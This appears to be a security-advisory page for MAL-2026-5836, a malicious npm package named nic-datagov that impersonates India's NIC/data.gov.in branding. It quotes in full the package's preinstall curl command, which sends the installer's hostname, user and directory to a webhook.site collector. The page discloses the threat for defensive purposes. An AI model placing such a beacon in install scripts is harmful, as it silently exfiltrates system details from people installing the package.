nic-datagov @1.0.0
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 4:30 AM UTC
OSV ID
MAL-2026-5836
Ecosystem
npm
Summary
package.json declares a preinstall script that runs curl --data-urlencode "info=$(hostname && whoami && pwd)" https://webhook.site/1ea0386f-dcc0-4f1b-bdbb-61732d6535fb/nic-datagov , sending the installer's hostname, current user, and working directory to a webhook.site collector on npm install . The package ships no library code and has no main / files consistent with its stated 'NIC Data.gov.in integration library' description — its sole effect on install is the recon beacon. The name and description impersonate India's NIC/data.gov.in branding, consistent with a targeted dependency-confusion probe against an internal/government namespace.
Source: amazon-inspector (89be7e0ea4d164dad90f5476041928d54d5502a066e22d501373e1bbf9dc8bbf)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.